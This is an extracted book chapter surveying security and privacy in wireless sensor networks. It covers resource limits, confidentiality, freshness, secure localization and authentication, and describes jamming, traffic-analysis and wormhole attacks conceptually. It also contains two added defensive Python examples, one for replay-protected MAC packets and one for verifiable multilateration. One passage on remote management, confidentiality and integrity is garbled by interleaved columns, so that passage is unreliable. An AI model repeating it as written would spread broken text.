Seshadri, A., Perrig, A., Van Doorn, L., & Khosla, P. K. (2004). SWATT: Software-based attestation for embedded devices. Paper presented at the IEEE Symposium on Security and Privacy. IEEE Computer Society.

Shrivastava, N., Buragohain, C., Agrawal, D., & Suri, S. (2004). Medians and beyond: New aggregation techniques for sensor networks. In Proceedings of the 2nd International Conference on Embedded Networked Sensor Systems, SenSys '04, New York (pp. 239-249). ACM Press.

Smailagic, A., & Kogan, D. (2002). Location privacy in pervasive computing. IEEE Wireless Communications, 9(5), 10-17.

Snekkenes, E. (2001). Concepts for personal location privacy policies. Paper presented at the ACM Conference on Electronic Commerce (pp. 48-57).

Stankovic, J. A., Abdelzaher, T. F., Lu, C., Sha, L., & Hou, J. C. (2003). Real-time communication and coordination in embedded sensor networks. Proceedings of the IEEE, 91(7), 1002-1022.

Tanachaiwiwat, S., Dave, P., Bhindwale, R., & Helmy, A. (2003). Secure locations: Routing on trust and isolating compromised sensors in location-aware sensor networks. In Proceedings of the 1st International Conference on Embedded Networked Sensor Systems, SenSys '03, New York (pp. 324-325). ACM Press.

Wagner, D. (2004). Resilient aggregation in sensor networks. In Proceedings of the 2nd ACM Workshop on Security of Ad Hoc and Sensor Networks, SASN '04, New York (pp. 78-87). ACM Press.

Wang, X., Gu, W., Chellappan, S., Schosek, K., & Xuan, D. (2005a). Lifetime optimization of sensor networks under physical attacks. Paper presented at the IEEE International Conference on Communications, ICC '05 (Vol. 5, pp. 3295-3301).

Wang, X., Gu, W., Chellappan, S., Xuan, D., & Lai, T. H. (2005b). Sacrificial node-assisted defense against search-based physical attacks in sensor networks (Tech. Rep.). Ohio State University, Department of Computer Science and Engineering.

Wang, X., Gu, W., Schosek, K., Chellappan, S., & Xuan, D. (2005c). Sensor network configuration under physical attacks. In X. Lu & W. Zhao (Eds.), ICCNMC (LNCS 3619, pp. 23-32). Springer.

Watro, R. J., Kong, D., Fen Cuti, S., Gardiner, C., Lynn, C., & Kruus, P. (2004). TinyPK: Securing sensor networks with public key technology. In Setia & Swarup (pp. 59-64).

Wood, A. D., & Stankovic, J. A. (2002). Denial of service in sensor networks. IEEE Computer, 35(10), 54-62.

Ye, F., Luo, H., Lu, S., & Zhang, L. (2005). Statistical en-route filtering of injected false data in sensor networks. IEEE Journal on Selected Areas in Communications, 23(4), 839-850.

Zhu, S., Setia, S., & Jajodia, S. (2003). LEAP: Efficient security mechanisms for large-scale distributed sensor networks. In Jajodia (pp. 62-72).

KEY TERMS

Compromised Node: A node on which an attacker has gained control after network deployment. Generally, compromise occurs once an attacker has found a node and then directly connects the node to their computer via a wired connection of some sort. Once connected, the attacker controls the node by extracting the data and/or putting new data or controls on that node.

Data Aggregation: Process of reducing large amounts of sensor-generated data to smaller and more representative data sets that synthesize the state of the phenomena that the network is monitoring.

Data Freshness: Implies that the sensed data are recent, and it ensures that no adversary has replayed old messages.

Insider Attacks: These types of attacks are those launched by adversaries that have access to one or more compromised nodes in a network. Insider attacks are the most challenging ones because the adversary has access to the network's cryptographic materials (i.e., keys, ciphers, and data).

Key Distribution: Process of efficiently distributing cryptographic keys to the nodes that belong to a network. These keys could either be pairwise keys (for two-party communications), group keys (for cluster-wide communication), or network keys (for secure broadcast communication).

Mote: A wireless receiver/transmitter that is typically combined with a sensor of some type to create a remote sensor. Some motes are designed to be incredibly small in size so that they can be deployed by the hundreds or even thousands for various applications.

Node Authentication: Process of ensuring that a given node and its data are legitimate.

Outsider Attacks: Attacks perpetrated by adversaries that do not have direct access to any of the authorized nodes in the network. However, the adversary may have access to the physical medium, particularly if we are dealing with wireless networks. Therefore, attacks such as message replay and eavesdropping fall into this classification. However, coping with this kind of attack is fairly easy by using traditional security techniques such as encryption and digital signatures.

Chapter XXXV
Security and Privacy in Wireless Sensor Networks:
Challenges and Solutions

Mohamed Hamdi
University of November 7th at Carthage, Tunisia

Noreddine Boudriga
University of November 7th at Carthage, Tunisia

ABSTRACT

The applications of wireless sensor networks (WSNs) are continuously expanding. Recently, consistent research and development activities have been associated to this field. Security ranks at the top of the issues that should be discussed when deploying a WSN. This is basically due to the fact that WSNs are, by nature, mission-critical. Their applications mainly include battlefield control, em (when a natural disaster occurs), and healthcare. This chapter reviews recent research results in the field of WSN security.

INTRODUCTION

The applications of wireless sensor networks (WSNs), which cover both the civil and military contexts, are continuously expanding. The ability to develop miniaturized, battery-powered motes that combine sensing, correlation, fusion, and wireless communication capabilities makes the WSN technology cost-effective for future use. In fact, WSNs can be used to gather and analyze information about vehicular movement, humidity, temperature, pressure, as well as many other parameters.

However, the enormous potential of WSNs can be unlocked only if the corresponding infrastructures are adequately safeguarded. In fact, violating one or more security properties would lead to wrong decisions, and consequently wrong reactions. Hence, security should rank at the top of the issues that should be discussed when designing a WSN. Another motivation is that WSNs are, by nature, mission-critical, meaning that they are developed for sensitive tasks where error tolerance is very small. The importance of security in the WSN context is exacerbated by certain factors, including the following:

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Security and Privacy in Wireless Sensor Networks: Challenges and Solutions

• Sensor nodes have limited storage, computation, and power resources. For this reason, security mechanisms should be adapted to the WSN capabilities.
• The network does not have a static infrastructure. WSN architectures can only be defined on the fly. This renders the application of existing robust cryptographic mechanisms (e.g., public key infrastructure [PKI], digital signatures) more difficult than in customary networks.
• The sensing and communication tasks are often performed in a hostile environment where the gathered events are subjected to numerous threats that might affect the final decision.
• The detected events are forwarded through the sensor nodes themselves, preventing the application of strong communication security mechanisms.

This chapter surveys recent research activities in the area of WSN security. More precisely, the following aspects will be discussed:

1. Wireless sensor networks: This section addresses several WSN basic issues to highlight the related scientific challenges. Components, architecture, topology, routing, mobile target tracking, and alert management will be, among others, discussed.
2. WSN security objectives: Traditional security goals (i.e., confidentiality, authenticity, integrity, and availability) should be extended to fit the requirements of WSNs. Several particular concepts are introduced at this level. For instance, confidentiality, authenticity, and integrity, which have been customarily associated to data and node identity, should be extended to cover node location. This poses several new security challenges in the WSN context.
3. Attacks against WSNs: This section describes the most important attack techniques concerning WSNs. Attacks are classified according to the basic security properties they violate. A taxonomy of these attacks will also be proposed. This taxonomy is based on three major attack activities: (1) attacks on transmitted information, (2) attacks on architecture, structure, and protocols, and (3) attacks on the localization framework.
4. Countermeasures: Potential security solutions that allow countering the aforementioned threats will be proposed. They will be classified according to the level at which they act (e.g., link level, routing, and application). Countermeasures will also be categorized into preventive and reactive solutions. For example, robust localization (resp. fault-tolerance) schemes belong to the first (resp. second) category.
5. Building security policies for WSNs: Several key security processes, such as monitoring and incident response, cannot be directly applied in the WSN field. They should therefore be heavily adapted in order to support WSN-specific constraints.

WIRELESS SENSOR NETWORKS

Due to advances in wireless communications and electronics over the last few years, the development of networks of low-cost, low-power, multifunctional sensors has received increasing attention. These sensors are small in size and able to sense, process data, and communicate with each other, typically over a radio frequency (RF) channel.

A sensor network is designed to detect events or phenomena, collect and process data, and transmit sensed information to interested users. Basic features of sensor networks are:

• Self-organizing capabilities
• Short-range broadcast communication and multihop routing
• Dense deployment and cooperative effort of sensor nodes
• Frequently changing topology due to fading and node failures
• Limitations in energy, transmit power, memory, and computing power

These characteristics, particularly the last three, make sensor networks different from other wireless ad hoc or mesh networks. Clearly, the idea of mesh networking is not new; it has been suggested for some time for wireless Internet access or voice communication. Similarly, small computers and sensors are not innovative per se. However, combining small sensors, low-power computers, and radios makes for a new technological platform that has numerous important uses and applications.

Wireless sensor networks are interesting from an engineering perspective, because they present a number of serious challenges that cannot be adequately addressed by existing technologies:

• Extended lifetime: As mentioned above, WSN nodes will generally be severely energy constrained due to the limitations of batteries. A typical alkaline battery, for example, provides about 50 watt-hours of energy; this may translate to less than a month of continuous operation for each node in full active mode. Given the expense and potential infeasibility of monitoring and replacing batteries for a large network, much longer lifetimes are desired. In practice, it will be necessary in many applications to provide guarantees that a network of unattended wireless sensors can remain operational without any replacements for several years.
• Responsiveness: A simple solution to extending network lifetime is to operate the nodes in a duty-cycled manner with periodic switching between sleep and wake-up modes. While synchronization of such sleep schedules is challenging in itself, a larger concern is that arbitrarily long sleep periods can reduce the responsiveness and effectiveness of the sensors. In applications where it is critical that certain events in the environment be detected and reported rapidly, the latency induced by sleep schedules must be kept within strict bounds, even in the presence of network congestion.
• Robustness: The vision of wireless sensor networks is to provide large-scale, yet fine-grained coverage. This motivates the use of large numbers of inexpensive devices. However, inexpensive devices can often be unreliable and prone to failures. Rates of device failure will also be high whenever the sensor devices are deployed in harsh or hostile environments. Protocol designs must therefore have built-in mechanisms to provide robustness. It is important to ensure that the global performance of the system is not sensitive to individual device failures. Further, it is often desirable that the performance of the system degrade as gracefully as possible with respect to component failure.
• Synergy: Moore's law-type advances in technology have ensured that device capabilities in terms of processing power, memory, storage, radio transceiver performance, and even accuracy of sensing improve rapidly (given a fixed cost). However, if economic considerations dictate that the cost per node be reduced drastically from hundreds of dollars to less than a few cents, it is possible that the capabilities of individual nodes will remain constrained to some extent. The challenge is therefore to design synergistic protocols, which ensure that the system as a whole is more capable than the sum of the capabilities of its individual components. The protocols must provide an efficient collaborative use of storage, computation, and communication resources.
• Scalability: For many envisioned applications, the combination of fine-granularity sensing and large coverage area implies that wireless sensor networks have the potential to be extremely large scale (tens of thousands, perhaps even millions of nodes in the long term). Protocols will have to be inherently distributed, involving localized communication, and sensor networks must utilize hierarchical architectures in order to provide such scalability. However, visions of large numbers of nodes will remain unrealized in practice until some fundamental problems, such as failure handling and in-situ reprogramming, are addressed even in small settings involving tens to hundreds of nodes.
There are also some fundamental limits on the throughput and capacity that impact the scalability of network performance.
• Heterogeneity: There will be a heterogeneity of device capabilities (with respect to computation, communication, and sensing) in realistic settings. This heterogeneity can have a number of important design consequences. For instance, the presence of a small number of devices of higher computational capability along with a large number of low-capability devices can dictate a two-tier, cluster-based network architecture, and the presence of multiple sensing modalities requires pertinent sensor fusion techniques. A key challenge is often to determine the right combination of heterogeneous device capabilities for a given application.
• Self-configuration: Because of their scale and the nature of their applications, wireless sensor networks are inherently unattended distributed systems. Autonomous operation of the network is therefore a key design challenge. From the very start, nodes in a wireless sensor network have to be able to configure their own network topology: localize, synchronize, and calibrate themselves, coordinate inter-node communication, and determine other important operating parameters.
• Privacy and security: The large scale, prevalence, and sensitivity of the information collected by wireless sensor networks (as well as their potential deployment in hostile locations) give rise to the final key challenge of ensuring both privacy and security.

WSN SECURITY OBJECTIVES

WSN Security Challenges

WSNs are characterized by many constraints compared to traditional communication networks. Due to these particular constraints, the application of existing network security approaches does not allow the required security properties to be fulfilled. Hence, appropriate security needs and techniques should be defined for WSN environments while borrowing concepts from the currently used security mechanisms. In the following, we highlight the WSN intrinsic features that are most relevant from a security point of view.

Resource Limitations

Security mechanisms and processes necessarily require a certain amount of processing, power, storage, and memory resources. However, sensor nodes are often resource-impoverished. In the following, we detail the basic resource limitations characterizing WSNs.

• Processing limitations: A custom processor for sensor nodes should essentially have a low-power sleep mode, which reduces energy consumption, and a low-overhead wakeup mechanism, which prevents network congestion due to signalling messages. Ekanayake (2004) shows that the processing speed offered by most of the available microcontrollers ranges between 4 and 400 MIPS. Even though this performance is enough to implement the communication functions, it turns out not to be sufficient to support advanced security mechanisms, especially when heavy traffic is exchanged across the WSN. For instance, it has been shown by Blaß (2005) that a traditional Diffie-Hellman key exchange operation would last 48.04 seconds on the Atmel ATmega processor. As a result, novel security algorithms should be considered to keep up with the sensor node processing limitations.
• Limited memory and storage space: A sensor is a tiny device with only a small amount of memory and storage space for the code. In order to build an effective security mechanism, it is necessary to limit the code size of the security algorithm. For example, one common sensor type (TelosB) has a 16-bit, 8 MHz RISC CPU with only 10K RAM, 48K program memory, and 1024K flash storage. With such a limitation, the software
built for the sensor must also be quite small. The total code space of TinyOS, the de facto standard operating system for wireless sensors, is approximately 4 K (Hill 2000), and the core scheduler occupies only 178 bytes. Therefore, the code size of all security-related code must also be reduced.
• Power limitation: Energy is the biggest constraint to wireless sensor capabilities. We assume that once sensor nodes are deployed in a sensor network, they cannot be easily replaced (high operating cost) or recharged (high cost of sensors). Therefore, the battery charge taken with them to the field must be conserved to extend the life of the individual sensor node and the entire sensor network. When implementing a cryptographic function or protocol within a sensor node, the energy impact of the added security code must be considered. When adding security to a sensor node, we are interested in the impact that security has on the lifespan of a sensor (i.e., its battery life). The extra power consumed by sensor nodes due to security is related to the processing required for security functions (e.g., encryption, decryption, signing data, and verifying signatures), the energy required to transmit the security-related data or overhead (e.g., initialization vectors needed for encryption/decryption), and the energy required to store security parameters in a secure manner (e.g., cryptographic key storage).

Data Loss

Certainly, unreliable communication is another threat to sensor security. The security of the network relies heavily on a defined protocol, which in turn depends on communication.

• Unreliable transfer: Normally the packet-based routing of the sensor network is connectionless and thus inherently unreliable. Packets may get damaged due to channel errors or dropped at highly congested nodes. The result is lost or missing packets. Furthermore, the unreliable wireless communication channel also results in damaged packets. A higher channel error rate also forces the software developer to devote resources to error handling. More importantly, if the protocol lacks the appropriate error handling, it is possible to lose critical security packets. This may include, for example, a cryptographic key.
• Collisions: WSNs impose strict requirements on a medium access protocol. This is basically due to the ad hoc architecture characterizing WSNs as well as the long network lifetime needs. Moreover, as data are broadcast over the radio link, packets may collide, resulting in a decrease of the channel throughput. Depending on the medium access and transport layer protocols, the information loss can reach a certain degree such that the analysis center is no longer able to identify the events corresponding to the gathered data.
• Latency: Multihop routing, network congestion, and node processing can lead to greater latency in the network, thus making it difficult to achieve synchronization among sensor nodes. The synchronization issues can be critical to sensor security where the security mechanism relies on critical event reports and cryptographic key distribution. Interested readers may refer to Stankovic (2003) on real-time communications in wireless sensor networks.

Uncontrollable Behavior

Depending on the function of the particular sensor network, the sensor nodes may be left unattended for long periods of time. There are three main caveats to unattended sensor nodes:

• Exposure to physical attacks: The sensor may be deployed in an environment open to adversaries, bad weather, and so on. The likelihood that a sensor suffers a physical attack in such an environment is therefore much higher than for a typical PC, which is located in a secure place and mainly faces attacks from a network.
• Managed remotely: Remote management of to build a secure channel in a wireless sensor


a sensor network makes it virtually impossible network.
to detect physical tampering (i.e., through • Public sensor information, such as sensor
tamperproof seals) and physical maintenance identities and public keys, should also be
issues (e.g., battery replacement). Perhaps encrypted to some extent to protect against
the most extreme example of this is a sensor trafficanalysisattacks.
node used for remote reconnaissance mis-
sions behind enemy lines. In such a case, the The standard approach for keeping sensitive
node may not have any physical contact with data secret is to encrypt the data with a secret key
friendly forces once deployed. that only intended receivers possess, thus achiev-
• No central management point: A sensor ingconfidentiality.
network should be a distributed network
without a central management point. This will Data Integrity
increase the vitality of the sensor network.
However, if designed incorrectly, it will make With the implementation of confidentiality, an
thenetworkorganizationdifficult, inefficient,
adversary may be unable to steal information.
and fragile.

Security Requirements

A sensor network is a special type of network. It shares some commonalities with a typical computer network, but also poses unique requirements of its own, as discussed in Section 3. Therefore, we can think of the requirements of a wireless sensor network as encompassing both the typical network requirements and the unique requirements suited solely to wireless sensor networks.

Data Confidentiality

Data confidentiality is the most important issue in network security. Every network with any security focus will typically address this problem first. In sensor networks, confidentiality relates to the following (Carman 2000; Perrig 2002):

• A sensor network should not leak sensor readings to its neighbors. Especially in a military application, the data stored in the sensor node may be highly sensitive.
• In many applications nodes communicate highly sensitive data, for example, key distribution; therefore it is extremely important

Data Integrity

However, this does not mean the data are safe. The adversary can change the data so as to send the sensor network into disarray. For example, a malicious node may add some fragments or manipulate the data within a packet. This new packet can then be sent to the original receiver. Data loss or damage can even occur without the presence of a malicious node, due to the harsh communication environment. Thus, data integrity ensures that any received data have not been altered in transit.

Data Freshness

Even if confidentiality and data integrity are assured, we also need to ensure the freshness of each message. Informally, data freshness suggests that the data are recent, and it ensures that no old messages have been replayed. This requirement is especially important when shared-key strategies are employed in the design. Typically, shared keys need to be changed over time. However, it takes time for new shared keys to be propagated to the entire network. In this case, it is easy for the adversary to use a replay attack. It is also easy to disrupt the normal work of a sensor if the sensor is unaware of the new key change time. To solve this problem, a nonce or another time-related counter can be added into the packet to ensure data freshness.
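Integrity, freshness and source authentication with a shared key can all be enforced on one small packet format. The following is an added example, not code from the chapter or from any of the protocols it cites: each packet carries a per-source counter and a truncated HMAC over header and payload, and the receiver rejects a bad MAC (tampering, unknown sender) and any counter that does not strictly increase (replay). The 16-byte preloaded key, the 1-byte source id, the 32-bit counter and the 4-byte MAC truncation are assumptions chosen for illustration.

```python
import hashlib
import hmac
import struct

# Assumptions for this example: a 16-byte key preloaded into sensor and sink
# before deployment, a 1-byte source id, a 32-bit per-source counter and a
# 4-byte truncated MAC (TinySec-sized; forgery chance 2^-32 per attempt).
SHARED_KEY = bytes(range(16))
MAC_LEN = 4
HDR = struct.Struct(">BI")          # src_id, counter (big-endian)


def compute_mac(key, header, payload):
    """Truncated HMAC-SHA256 over header and payload."""
    return hmac.new(key, header + payload, hashlib.sha256).digest()[:MAC_LEN]


def build_packet(src_id, counter, payload, key=SHARED_KEY):
    """Frame = src_id | counter | payload | MAC. The MAC covers the counter,
    so an attacker cannot bump the counter of a captured packet."""
    header = HDR.pack(src_id, counter)
    return header + payload + compute_mac(key, header, payload)


class Receiver:
    """Sink-side check: MAC first (integrity, origin), then freshness."""

    def __init__(self, key=SHARED_KEY):
        self.key = key
        self.last_counter = {}      # src_id -> highest counter accepted so far

    def accept(self, packet):
        """Returns (payload, "ok") or (None, reason)."""
        if len(packet) < HDR.size + MAC_LEN:
            return None, "truncated"
        header = packet[:HDR.size]
        payload = packet[HDR.size:-MAC_LEN]
        tag = packet[-MAC_LEN:]
        # Constant-time compare so the MAC check itself does not leak timing.
        if not hmac.compare_digest(tag, compute_mac(self.key, header, payload)):
            return None, "bad MAC"
        src_id, counter = HDR.unpack(header)
        # A counter that is not strictly greater than the last accepted one
        # from this source is a replay (or a stale, reordered packet).
        if counter <= self.last_counter.get(src_id, -1):
            return None, "replay"
        self.last_counter[src_id] = counter
        return payload, "ok"


def demo():
    """Constructed traffic: a genuine packet, its replay, a tampered copy."""
    rx = Receiver()
    p1 = build_packet(7, 1, b"temp=21")
    tampered = p1[:HDR.size] + b"temp=99" + p1[-MAC_LEN:]
    return [rx.accept(p1)[1], rx.accept(p1)[1], rx.accept(tampered)[1],
            rx.accept(build_packet(7, 2, b"temp=22"))[1]]
```

The counter must be rekeyed before it wraps (2^32 packets here), and the receiver's last-counter table is per source, which is why a node's id must be under the MAC as well. Loosely synchronized time could replace the counter, at the cost of needing the secure time synchronization the chapter discusses.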

Security and Privacy in Wireless Sensor Networks: Challenges and Solutions

Availability

Adjusting the traditional encryption algorithms to fit within the wireless sensor network is not free, and will introduce some extra costs. Some approaches choose to modify the code to reuse as much code as possible. Some approaches try to make use of additional communication to achieve the same goal. What is more, some approaches force strict limitations on the data access, or propose an unsuitable scheme (such as a central point scheme) in order to simplify the algorithm. But all these approaches weaken the availability of a sensor and of the sensor network for the following reasons:

• Additional computation consumes additional energy. If no more energy exists, the data will no longer be available.
• Additional communication also consumes more energy. What is more, as communication increases so too does the chance of incurring a communication conflict.
• A single point of failure will be introduced if using the central point scheme. This greatly threatens the availability of the network.
• The requirement of security not only affects the operation of the network, but also is highly important in maintaining the availability of the whole network.

Self-Organization

A wireless sensor network is typically an ad hoc network, which requires every sensor node to be independent and flexible enough to be self-organizing and self-healing according to different situations. There is no fixed infrastructure available for the purpose of network management in a sensor network. This inherent feature brings a great challenge to wireless sensor network security as well. For example, the dynamics of the whole network inhibit the idea of preinstallation of a shared key between the base station and all sensors (Eschenauer 2002). Several random key predistribution schemes have been proposed in the context of symmetric encryption techniques (Chan 2003; Eschenauer 2002; Hwang 2004; Liu 2005). In the context of applying public-key cryptography techniques in sensor networks, an efficient mechanism for public-key distribution is necessary as well. In the same way that distributed sensor networks must self-organize to support multihop routing, they must also self-organize to conduct key management and to build trust relations among sensors. If self-organization is lacking in a sensor network, the damage resulting from an attack, or even from the hazardous environment, may be devastating.

Time Synchronization

Most sensor network applications rely on some form of time synchronization. In order to conserve power, an individual sensor's radio may be turned off for periods of time. Furthermore, sensors may wish to compute the end-to-end delay of a packet as it travels between two pairwise sensors. A more collaborative sensor network may require group synchronization for tracking applications and so forth. Ganeriwal et al. (2005) propose a set of secure synchronization protocols for sender-receiver (pairwise), multihop sender-receiver (for use when the pair of nodes are not within single-hop range), and group synchronization.

Secure Localization

Often, the utility of a sensor network will rely on its ability to accurately and automatically locate each sensor in the network. A sensor network designed to locate faults will need accurate location information in order to pinpoint the location of a fault. Unfortunately, an attacker can easily manipulate nonsecured location information by reporting false signal strengths, replaying signals, and so forth.

A technique called verifiable multilateration (VM) is described by Capkun (2006). In multilateration, a device's position is accurately computed from a series of known reference points. Capkun (2006) uses authenticated ranging and distance bounding to ensure accurate location of a node.
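As an added worked example (not the chapter's code and not Capkun's implementation), the following computes a node's position from three distance bounds and applies the consistency check that verifiable multilateration relies on: distance bounding only lets a prover enlarge a measured distance, so when the node lies inside the triangle formed by the three verifiers, enlarging one distance yields a position whose distances to the other two verifiers are shorter than what they measured, and no point fits all three bounds. The verifier coordinates, the node position, the inflation of 20 units and the tolerance of 1 unit are constructed for illustration.

```python
import math


def distance_bound(true_pos, verifier, inflate=0.0):
    """One authenticated distance-bounding round. A prover can delay its
    reply (inflate >= 0) but cannot answer before the challenge arrives,
    so it can only make itself look farther away, never closer."""
    if inflate < 0:
        raise ValueError("a prover cannot shorten a distance bound")
    return math.dist(true_pos, verifier) + inflate


def trilaterate(verifiers, dists):
    """Exact solution for three verifiers: subtracting the first circle
    equation from the other two gives a 2x2 linear system in (x, y)."""
    (x1, y1), (x2, y2), (x3, y3) = verifiers
    d1, d2, d3 = dists
    a11, a12 = 2 * (x2 - x1), 2 * (y2 - y1)
    a21, a22 = 2 * (x3 - x1), 2 * (y3 - y1)
    b1 = d1 ** 2 - d2 ** 2 - x1 ** 2 + x2 ** 2 - y1 ** 2 + y2 ** 2
    b2 = d1 ** 2 - d3 ** 2 - x1 ** 2 + x3 ** 2 - y1 ** 2 + y3 ** 2
    det = a11 * a22 - a12 * a21
    if det == 0:
        raise ValueError("verifiers must not be collinear")
    return ((b1 * a22 - a12 * b2) / det, (a11 * b2 - a21 * b1) / det)


def inside_triangle(p, tri):
    """True when p is inside (or on the edge of) the verifier triangle."""
    def cross(o, a, b):
        return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])
    signs = [cross(tri[i], tri[(i + 1) % 3], p) for i in range(3)]
    return all(s >= 0 for s in signs) or all(s <= 0 for s in signs)


def verify_position(verifiers, bounds, tol=1.0):
    """Verifiable multilateration check: the position implied by the three
    bounds must lie inside the verifier triangle and reproduce every bound
    within `tol`. Returns (position, worst residual, accepted)."""
    pos = trilaterate(verifiers, bounds)
    residual = max(abs(math.dist(pos, v) - d) for v, d in zip(verifiers, bounds))
    accepted = inside_triangle(pos, verifiers) and residual <= tol
    return pos, residual, accepted


# Constructed deployment: three trusted verifiers and one node inside them.
VERIFIERS = [(0.0, 0.0), (100.0, 0.0), (50.0, 90.0)]
TRUE_POS = (40.0, 30.0)


def demo():
    honest = [distance_bound(TRUE_POS, v) for v in VERIFIERS]
    cheat = [distance_bound(TRUE_POS, VERIFIERS[0], inflate=20.0)] + honest[1:]
    return verify_position(VERIFIERS, honest), verify_position(VERIFIERS, cheat)
```

The honest run reproduces (40, 30) with a residual near zero; the run in which the node delays its reply to the first verifier lands at about (52, 36.7) with a residual above seven units and is rejected. Real deployments need the tolerance set from the ranging error of the radio, and the inside-triangle condition is what prevents an attacker outside the verifiers from trading one enlarged distance against another.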


Because of distance bounding, an attacking node can only increase its claimed distance from a reference point. However, to ensure location consistency, an attacking node would also have to prove that its distance from another reference point is shorter. Since it cannot do this, a node manipulating the localization protocol can be found. For large sensor networks, the secure positioning for sensor networks (SPINE) algorithm is used. It is a three-phase algorithm based upon verifiable multilateration.

Lazos (2005) describes secure range-independent localization (SeRLoc). Its novelty is its decentralized, range-independent nature. SeRLoc uses locators that transmit beacon information. It is assumed that the locators are trusted and cannot be compromised. Furthermore, each locator is assumed to know its own location. A sensor computes its location by listening for the beacon information sent by each locator. The beacons include the locator's location. Using all of the beacons that a sensor node detects, a node computes an approximate location based on the coordinates of the locators. Using a majority vote scheme, the sensor then computes an overlapping antenna region. The final computed location is the centroid of the overlapping antenna region. All beacons transmitted by the locators are encrypted with a shared global symmetric key that is preloaded to the sensor prior to deployment. Each sensor also shares a unique symmetric key with each locator. This key is also preloaded on each sensor.

Authentication

An adversary is not just limited to modifying the data packet. It can change the whole packet stream by injecting additional packets. So the receiver needs to ensure that the data used in any decision-making process originate from the correct source. On the other hand, when constructing the sensor network, authentication is necessary for many administrative tasks (e.g., network reprogramming or controlling sensor node duty cycle). From the above, we can see that message authentication is important for many applications in sensor networks. Informally, data authentication allows a receiver to verify that the data really are sent by the claimed sender. In the case of two-party communication, data authentication can be achieved through a purely symmetric mechanism: the sender and the receiver share a secret key to compute the message authentication code (MAC) of all communicated data.

Perrig et al. (2002) propose a key-chain distribution system for their μTESLA secure broadcast protocol. The basic idea of μTESLA is to obtain the asymmetry of a signature from symmetric keys by delaying the disclosure of those keys. In this case a sender will broadcast a message authenticated with a secret key. After a certain period of time, the sender will disclose the secret key. The receiver is responsible for buffering the packet until the secret key has been disclosed. After disclosure the receiver can authenticate the packet, provided that the packet was received before the key was disclosed. One limitation of μTESLA is that some initial information must be unicast to each sensor node before authentication of broadcast messages can begin. Liu and Ning (2003, 2004) propose an enhancement to the μTESLA system that uses broadcasting of the key chain commitments rather than μTESLA's unicasting technique. They present a series of schemes starting with a simple predetermination of key chains and finally settling on a multilevel key chain technique. The multilevel key chain scheme uses predetermination and broadcasting to achieve a scalable key distribution technique that is designed to be resistant to denial-of-service (DoS) attacks, including jamming.

Attacks against WSNs

Sensor networks are particularly vulnerable to several key types of attacks. Attacks can be performed in a variety of ways, most notably as denial-of-service attacks, but also through traffic analysis, privacy violation, physical attacks, and so on. Denial-of-service attacks on wireless sensor networks can range from simply jamming the sensor's communication channel to more sophisticated attacks designed to violate the 802.11 MAC protocol (Perrig 2004) or any other layer of the wireless sensor network.


Due to the potential asymmetry in power and computational constraints, guarding against a well-orchestrated denial-of-service attack on a wireless sensor network can be nearly impossible. A more powerful node can easily jam a sensor node and effectively prevent the sensor network from performing its intended duty. We note that attacks on wireless sensor networks are not limited to simply denial-of-service attacks, but rather encompass a variety of techniques including node takeovers, attacks on the routing protocols, and attacks on a node's physical security. In this section, we first address some common denial-of-service attacks and then describe additional attacks, including those on the routing protocols as well as an identity-based attack known as the Sybil attack.

Denial-of-Service Attacks

A standard attack on wireless sensor networks is simply to jam a node or set of nodes. Jamming, in this case, is simply the transmission of a radio signal that interferes with the radio frequencies being used by the sensor network (Wood 2002). The jamming of a network can come in two forms: constant jamming and intermittent jamming. Constant jamming involves the complete jamming of the entire network. No messages are able to be sent or received. If the jamming is only intermittent, then nodes are able to exchange messages periodically, but not consistently. This too can have a detrimental impact on the sensor network, as the messages being exchanged between nodes may be time sensitive. Attacks can also be made on the link layer itself. One possibility is that an attacker may simply intentionally violate the communication protocol, for example, the ZigBee or IEEE 802.11b (Wi-Fi) protocol, and continually transmit messages in an attempt to generate collisions. Such collisions would require the retransmission of any packet affected by the collision. Using this technique it would be possible for an attacker to simply deplete a sensor node's power supply by forcing too many retransmissions. At the routing layer, a node may take advantage of a multihop network by simply refusing to route messages. This could be done intermittently or constantly, with the net result being that any neighbor who routes through the malicious node will be unable to exchange messages with, at least, part of the network. The transport layer is also susceptible to attack, as in the case of flooding. Flooding can be as simple as sending many connection requests to a susceptible node. In this case, resources must be allocated to handle the connection request. Eventually, a node's resources will be exhausted, thus rendering the node useless.

Traffic Analysis Attacks

Wireless sensor networks are typically composed of many low-power sensors communicating with a few relatively robust and powerful base stations. It is not unusual, therefore, for data to be gathered by the individual nodes and ultimately routed to the base station. Often, for an adversary to effectively render the network useless, the attacker can simply disable the base station. To make matters worse, Deng et al. (2005) demonstrate two attacks that can identify the base station in a network (with high probability) without even understanding the contents of the packets (if the packets are themselves encrypted).

A rate monitoring attack simply makes use of the idea that nodes closest to the base station tend to forward more packets than those farther away from the base station. An attacker needs only to monitor which nodes are sending packets and follow those nodes that are sending the most packets. In a time correlation attack, an adversary simply generates events and monitors to whom a node sends its packets. To generate an event, the adversary could simply generate a physical event that would be monitored by the sensor(s) in the area (turning on a light, for instance).

Wormhole Attacks

In a wormhole attack, an attacker receives packets at one point in the network, "tunnels" them to another point in the network, and then replays them into the network from that point. For tunneled distances longer than the normal wireless transmission range of a single hop, it is simple for the attacker to make the tunneled packet arrive with a better metric than a normal multihop route,


for example, through use of a single long-range directional wireless link or through a direct wired link to a colluding attacker. It is also possible for the attacker to forward each bit over the wormhole directly, without waiting for an entire packet to be received before beginning to tunnel the bits of the packet, in order to minimize the delay introduced by the wormhole. Due to the nature of wireless transmission, the attacker can create a wormhole even for packets not addressed to it, since it can overhear them in wireless transmission and tunnel them to the colluding attacker at the opposite end of the wormhole. If the attacker performs this tunneling honestly and reliably, no harm is done; the attacker actually provides a useful service in connecting the network more efficiently. However, the wormhole puts the attacker in a very powerful position relative to other nodes in the network, and the attacker could exploit this position in a variety of ways. The attack can also still be performed even if the network communication provides confidentiality and authenticity, and even if the attacker has no cryptographic keys. Furthermore, the attacker is invisible at higher layers; unlike a malicious node in a routing protocol, which can often easily be named, the presence of the wormhole and the two colluding attackers at either endpoint of the wormhole are not visible in the route. The wormhole attack is particularly dangerous against many ad hoc network routing protocols in which the nodes that hear a packet transmission directly from some node consider themselves to be in range of (and, thus, a neighbor of) that node.

Attacks against Privacy

